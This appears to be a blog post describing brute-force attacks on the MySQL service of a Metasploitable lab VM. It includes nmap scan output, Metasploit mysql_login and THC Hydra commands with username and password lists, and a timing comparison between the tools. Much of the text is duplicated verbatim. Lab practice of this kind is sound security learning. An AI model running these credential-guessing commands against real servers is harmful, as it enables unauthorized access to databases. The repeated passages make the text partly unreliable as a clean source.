PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
25/tcp open smtp Postfix smtpd
53/tcp open domain
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
First I wanted to execute some brute-force attacks against the MySQL database that is running in Metasploitable. There are different ways of brute-forcing it, but your scanner is just as good as you're wordlist or wordcombination files for usernames and passwords are (here are username and password lists for a first shot).
As password list, I'm using elitehacker.txt.bz2 provided by skullsecurity.org and I defined six different users:
root@bt:~/test_environment/brute_force# cat username.txt
admin
root
mysql
db
test
user
I inserted also all of these six users and a blank line into the elitehackers.txt password file.
As password list, I'm using elitehacker.txt.bz2 provided by skullsecurity.org and I defined six different users:
root@bt:~/test_environment/brute_force# cat username.txt
admin
root
mysql
db
test
user
I inserted also all of these six users and a blank line into the elitehackers.txt password file.
1. Using Metasploit
#msfconsole
#search mysql
#use auxiliary/scanner/mysql/mysql_login
#show options
#set RHOSTS <Target IP>
#set USER_FILE /root/<your_username_file>
#set PASS_FILE /root/<your_password_file>
#exploit
The verbose mode is set by default to true, so you can see all login attempts. This is not very convenient, because of two reasons:
a) If the brute force attempt is successful you have to scroll back the whole list of attempts to find the login as there is no summary after finishing the mysql_login module (can be very nasty).
b) The actual scan time is decreasing dramatically. When I was scanning with verbose set to true, it took me 5 Minutes and 5 Seconds. After deactivating verbose mode, the scan was done in 2 Minutes and 5 Seconds.
Conclusion => #set VERBOSE false
2. Using THC Hydra
#hydra -L /root/<your_username_file> -P /root/<your_password_file> <IP> mysql
3. Result
So here is an overview of the results (all scans were executed with the same user- and passwordfile).
It was just a very small brute-forcing attack (5.412 username/password combinations), but Metasploit took almost 25% more time than Hydra with the same wordlists when verbose mode is activated in mysql_login.
If verbose mode is deactivated it is by far the most effective way to brute force mysql.
I don't know if this will scale in the same manner if the brute force attack will have more combinations, but the mysql_login module of Metasploit seems more efficient for mysql brute forcing than THC Hydra.
So let's check this finding manually:
So now we have another login, for a new attack :-)
#show options
#set RHOSTS <Target IP>
#set USER_FILE /root/<your_username_file>
#set PASS_FILE /root/<your_password_file>
#exploit
The verbose mode is set by default to true, so you can see all login attempts. This is not very convenient, because of two reasons:
a) If the brute force attempt is successful you have to scroll back the whole list of attempts to find the login as there is no summary after finishing the mysql_login module (can be very nasty).
b) The actual scan time is decreasing dramatically. When I was scanning with verbose set to true, it took me 5 Minutes and 5 Seconds. After deactivating verbose mode, the scan was done in 2 Minutes and 5 Seconds.
Conclusion => #set VERBOSE false
2. Using THC Hydra
#hydra -L /root/<your_username_file> -P /root/<your_password_file> <IP> mysql
3. Result
So here is an overview of the results (all scans were executed with the same user- and passwordfile).
| mysql_login (verbose mode activated) | 5 Minutes 5 Seconds |
| mysql_login (verbose mode deactivated) | 2 Minutes 5 Seconds |
| THC Hydra | 4 Minutes 8 Seconds |
It was just a very small brute-forcing attack (5.412 username/password combinations), but Metasploit took almost 25% more time than Hydra with the same wordlists when verbose mode is activated in mysql_login.
If verbose mode is deactivated it is by far the most effective way to brute force mysql.
I don't know if this will scale in the same manner if the brute force attack will have more combinations, but the mysql_login module of Metasploit seems more efficient for mysql brute forcing than THC Hydra.
So let's check this finding manually:
So now we have another login, for a new attack :-)
No comments:
Post a Comment